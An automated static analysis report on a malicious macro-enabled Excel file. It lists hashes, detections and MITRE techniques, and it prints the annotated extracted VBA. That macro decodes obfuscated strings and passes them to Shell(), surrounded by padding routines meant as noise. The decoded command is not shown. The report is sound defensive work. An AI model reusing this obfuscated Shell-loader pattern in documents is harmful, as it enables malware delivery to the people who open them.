Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c3164407257b993d…

MALICIOUS

Office (OOXML)

58.7 KB Created: 2006-09-16 00:00:00 UTC (document-property metadata: author-controlled and not a reliable timestamp — the exact-midnight value and the 14-year gap to first-seen are consistent with a reused template or a forged date) Authoring application: Microsoft Excel 12.0000 First seen: 2020-09-07
MD5: c62d0af3bcf7063f59465671c686aa8c SHA-1: 3fd5698db16d0aa72162b915c2c6cca146fb4e5b SHA-256: c3164407257b993dc3eb339805822f2c597e3985b3ae8bf8f08d44e3aa00fea3
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' flags a Shell() call in the VBA macro. The 'Pimp' subroutine builds its command from two calls to a string decoder, YoTpIoY3l(), each given an obfuscated literal and a key-like string, and passes the concatenated result to Shell(); the decoder's body is not in the preview, so the plaintext command was not recovered in this static pass. The remaining routines in the module are filler — no-op DoEvents loops, comparisons of two different literals that can never be true, and GoTo jumps to the very next line — and the preview shows neither a call to Pimp nor an Auto_Open/Workbook_Open trigger, so the invocation path is not established here. A Shell() launch from an obfuscated string is consistent with a downloader or loader stage, and the ClamAV signature 'Xls.Malware.Stratos-7506050-0' independently classifies the file as malicious, but the detection name alone does not establish what the command does. No exploit is present — execution depends on the user enabling macros — so T1203 (Exploitation for Client Execution) is a loose fit; T1204.002 (User Execution: Malicious File) describes the delivery more precisely.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 28690 bytes
SHA-256: 876de2fadf2904072d32dc58492b3aba65c238af6edcacedea4f566e5cb71f77
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Routine flagged by OLE_VBA_SHELL. Builds a command string from two calls to the
' decoder YoTpIoY3l (not shown in this preview; it takes an obfuscated literal and a
' key-like string) and hands the concatenation to Shell(). The plaintext command is
' not recoverable from this listing alone.
' NOTE(review): no Auto_Open/Workbook_Open trigger or caller of Pimp is visible in
' the preview, so how this routine gets invoked is not established here.
Public Sub Pimp()

' Y6 is never declared (no Option Explicit in view), so it is an implicit Variant
' holding the first decoded fragment of the command.
Y6 = YoTpIoY3l("  ?  M  < ", "imWrrmwfH")

' Second fragment decoded and appended, then executed via Shell().
Shell (Y6 + YoTpIoY3l("W=8Rv&9;;   Y }", "mad8XKIgZ"))

End Sub
' Filler routine: assigns the string literal "6084" to a Long (implicit coercion) and
' returns. Not referenced anywhere in the visible listing; no observable effect.
Private Sub kIBxIaoKxHfaDElFKS()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"

End Sub
' Filler routine: same "6084"-to-Long assignment as the other padding functions, then
' a 27-iteration DoEvents loop (7 up to 33). Returns nothing useful (untyped Function,
' no assignment to its name); not referenced in the visible listing.
Private Function MpuHEnAaaBJQySVnNoztLuQALRNZq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
' Busy-wait that yields to the message pump each pass; likely timing/sandbox noise.
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop

End Function
' Filler routine: "6084"-to-Long assignment, 27-iteration DoEvents loop, then a GoTo
' whose label is the very next line (a no-op jump). No return value is set; not
' referenced in the visible listing.
Public Function SwbZGvPFwKUDDq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
' Jump target is the next statement, so this changes nothing.
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:

End Function
' Filler routine: "6084"-to-Long assignment, 27-iteration DoEvents loop, a no-op GoTo
' to the next line, then six more DoEvents calls. No side effects beyond yielding to
' the message pump; not referenced in the visible listing.
Public Sub cieqGHdfoLsVmSZsApU()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
' Jump target is the next statement, so this changes nothing.
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM

End Sub
' Filler routine: same padding pattern as the routines above, plus an If that compares
' two different string literals. That comparison is always False, so the End statement
' (which would terminate the macro) can never run. Not referenced in the visible listing.
Private Sub GtUrDRzQCGhURLebyTs()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
' Jump target is the next statement, so this changes nothing.
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
' Dead branch: the two literals differ, so End is unreachable.
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End

End Sub
' Filler routine: the padding pattern of the routines above (Long assignment, DoEvents
' loops, no-op GoTo, always-False If) plus a second 13-iteration DoEvents loop
' (7 up to 19). No observable effect; not referenced in the visible listing.
Public Sub SQxQicusOkI()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
' Jump target is the next statement, so this changes nothing.
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
' Dead branch: the two literals differ, so End is unreachable.
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
   DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop

End Sub
' Filler routine: padding pattern of the routines above plus a second always-False
' literal comparison guarding another unreachable End. No return value is set; not
' referenced in the visible listing.
Private Function GLjqxbonDHKBbqjSA()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
' Jump target is the next statement, so this changes nothing.
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
' Dead branch: the two literals differ, so End is unreachable.
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
   DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
' Second dead branch: different literals again, End never runs.
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End

End Function
' Filler routine: padding pattern of the routines above, two always-False literal
' comparisons, and a trailing GoTo to the next line. No return value is set; not
' referenced in the visible listing.
Public Function NeEETJMEdGljQFaQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
' Jump target is the next statement, so this changes nothing.
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
' Dead branch: the two literals differ, so End is unreachable.
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
   DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
' Second dead branch: different literals again, End never runs.
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End
' Jump target is the next statement, so this changes nothing.
GoTo NBBdlxatZwObOMGZVs
NBBdlxatZwObOMGZVs:

End Function
Public Sub nsoARSopyQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 107008 bytes
SHA-256: 9f1e3794c339f2e9a0715f581ea2926bf7b8f6ffd89d96a82a57082e5ab592b7
Detection
ClamAV: Xls.Malware.Stratos-7506050-0
Obfuscation or payload: unlikely (automated verdict that appears to apply to the xl/vbaProject.bin container; it conflicts with the obfuscated string decoding seen in the extracted macro above, so treat this field as low-confidence rather than as a statement about the macro)